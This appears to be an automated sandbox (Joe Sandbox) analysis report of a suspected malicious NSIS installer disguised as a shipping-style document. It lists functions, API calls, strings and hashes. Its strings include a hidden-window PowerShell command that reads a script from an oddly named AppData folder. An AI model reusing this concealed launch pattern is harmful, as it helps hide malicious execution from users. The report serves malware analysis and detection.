                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                      • API String ID: 1975747703-1665175156
                                                      • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                      • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                      • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                      • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004030D5 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 383 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 386 403125-40312a 383->386 387 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 383->387 388 40336f-403373 386->388 395 403163 387->395 396 403248-403256 call 403033 387->396 398 403168-40317f 395->398 402 403327-40332c 396->402 403 40325c-40325f 396->403 400 403181 398->400 401 403183-40318c call 4035e7 398->401 400->401 410 403192-403199 401->410 411 4032e3-4032eb call 403033 401->411 402->388 405 403261-403279 call 4035fd call 4035e7 403->405 406 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 403->406 405->402 435 40327f-403285 405->435 432 4032d9-4032de 406->432 433 4032ed-40331d call 4035fd call 403376 406->433 412 403215-403219 410->412 413 40319b-4031af call 40612d 410->413 411->402 420 403223-403229 412->420 421 40321b-403222 call 403033 412->421 413->420 430 4031b1-4031b8 413->430 423 403238-403240 420->423 424 40322b-403235 call 406b63 420->424 421->420 423->398 431 403246 423->431 424->423 430->420 437 4031ba-4031c1 430->437 431->396 432->388 444 403322-403325 433->444 435->402 435->406 437->420 439 4031c3-4031ca 437->439 439->420 441 4031cc-4031d3 439->441 441->420 443 4031d5-4031f5 441->443 443->402 445 4031fb-4031ff 443->445 444->402 446 40332e-40333f 444->446 449 403201-403205 445->449 450 403207-40320f 445->450 447 403341 446->447 448 403347-40334c 446->448 447->448 451 40334d-403353 448->451 449->431 449->450 450->420 452 403211-403213 450->452 451->451 453 403355-40336d call 40612d 451->453 452->420 453->388
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004030E9
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403105
                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040314E
                                                      • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                      Strings
                                                      • "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", xrefs: 004030DE
                                                      • soft, xrefs: 004031C3
                                                      • Null, xrefs: 004031CC
                                                      • Error launching installer, xrefs: 00403125
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
                                                      • Inst, xrefs: 004031BA
                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                      • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-481959147
                                                      • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                      • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                      • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                      • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004066BF Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 456 4066bf-4066c8 457 4066ca-4066d9 456->457 458 4066db-4066f5 456->458 457->458 459 406905-40690b 458->459 460 4066fb-406707 458->460 461 406911-40691e 459->461 462 406719-406726 459->462 460->459 463 40670d-406714 460->463 465 406920-406925 call 406682 461->465 466 40692a-40692d 461->466 462->461 464 40672c-406735 462->464 463->459 467 4068f2 464->467 468 40673b-40677e 464->468 465->466 470 406900-406903 467->470 471 4068f4-4068fe 467->471 472 406784-406790 468->472 473 406896-40689a 468->473 470->459 471->459 474 406792 472->474 475 40679a-40679c 472->475 476 40689c-4068a3 473->476 477 4068ce-4068d2 473->477 474->475 480 4067d6-4067d9 475->480 481 40679e-4067c4 call 406550 475->481 478 4068b3-4068bf call 406682 476->478 479 4068a5-4068b1 call 4065c9 476->479 482 4068e2-4068f0 lstrlenW 477->482 483 4068d4-4068dd call 4066bf 477->483 492 4068c4-4068ca 478->492 479->492 487 4067db-4067e7 GetSystemDirectoryW 480->487 488 4067ec-4067ef 480->488 497 4067ca-4067d1 call 4066bf 481->497 498 40687e-406881 481->498 482->459 483->482 493 406879-40687c 487->493 494 406801-406805 488->494 495 4067f1-4067fd GetWindowsDirectoryW 488->495 492->482 499 4068cc 492->499 493->498 500 40688e-406894 call 406930 493->500 494->493 496 406807-406825 494->496 495->494 502 406827-40682d 496->502 503 406839-406845 call 406a76 496->503 497->493 498->500 505 406883-406889 lstrcatW 498->505 499->500 500->482 509 406835-406837 502->509 512 40684d-406851 503->512 505->500 509->503 511 406873-406877 509->511 511->493 513 406853-406866 SHGetPathFromIDListW CoTaskMemFree 512->513 514 406868-406871 512->514 513->511 513->514 514->496 514->511
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004067E1
                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                      • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406855
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406889
                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                      • String ID: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 4024019347-2983627749
                                                      • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                      • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                      • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                      • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 579 401774-401799 call 402dab call 405fc8 584 4017a3-4017b5 call 406682 call 405f51 lstrcatW 579->584 585 40179b-4017a1 call 406682 579->585 590 4017ba-4017bb call 406930 584->590 585->590 594 4017c0-4017c4 590->594 595 4017c6-4017d0 call 4069df 594->595 596 4017f7-4017fa 594->596 603 4017e2-4017f4 595->603 604 4017d2-4017e0 CompareFileTime 595->604 597 401802-40181e call 406172 596->597 598 4017fc-4017fd call 40614d 596->598 606 401820-401823 597->606 607 401892-4018bb call 405707 call 403376 597->607 598->597 603->596 604->603 608 401874-40187e call 405707 606->608 609 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 606->609 619 4018c3-4018cf SetFileTime 607->619 620 4018bd-4018c1 607->620 621 401887-40188d 608->621 609->594 641 401869-40186a 609->641 623 4018d5-4018e0 FindCloseChangeNotification 619->623 620->619 620->623 624 402c38 621->624 627 4018e6-4018e9 623->627 628 402c2f-402c32 623->628 626 402c3a-402c3e 624->626 631 4018eb-4018fc call 4066bf lstrcatW 627->631 632 4018fe-401901 call 4066bf 627->632 628->624 638 401906-4023a7 call 405ce2 631->638 632->638 638->626 638->628 641->621 643 40186c-40186d 641->643 643->608
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                      • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl,"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl,00000000,00000000,"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151,?,?,00000031), ref: 004017DA
                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151$afsmitningernes$distributed\Ristingets\
                                                      • API String ID: 1941528284-102784884
                                                      • Opcode ID: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                      • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                      • Opcode Fuzzy Hash: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                      • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405707 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 645 405707-40571c 646 405722-405733 645->646 647 4057d3-4057d7 645->647 648 405735-405739 call 4066bf 646->648 649 40573e-40574a lstrlenW 646->649 648->649 651 405767-40576b 649->651 652 40574c-40575c lstrlenW 649->652 654 40577a-40577e 651->654 655 40576d-405774 SetWindowTextW 651->655 652->647 653 40575e-405762 lstrcatW 652->653 653->651 656 405780-4057c2 SendMessageW * 3 654->656 657 4057c4-4057c6 654->657 655->654 656->657 657->647 658 4057c8-4057cb 657->658 658->647
                                                      APIs
                                                      • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                      • lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                      • lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Completed
                                                      • API String ID: 2531174081-3087654605
                                                      • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                      • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                      • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                      • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401E53 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401E56
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      • Opcode ID: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
                                                      • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                      • Opcode Fuzzy Hash: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
                                                      • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 668 406a06-406a26 GetSystemDirectoryW 669 406a28 668->669 670 406a2a-406a2c 668->670 669->670 671 406a3d-406a3f 670->671 672 406a2e-406a37 670->672 674 406a40-406a73 wsprintfW LoadLibraryExW 671->674 672->671 673 406a39-406a3b 672->673 673->674
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                      • wsprintfW.USER32 ref: 00406A58
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME
                                                      • API String ID: 2200240437-1106614640
                                                      • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                      • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                      • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                      • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 675 4061a1-4061ad 676 4061ae-4061e2 GetTickCount GetTempFileNameW 675->676 677 4061f1-4061f3 676->677 678 4061e4-4061e6 676->678 680 4061eb-4061ee 677->680 678->676 679 4061e8 678->679 679->680
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004061BF
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-678247507
                                                      • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                      • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                      • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                      • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                      Download Yara Rule

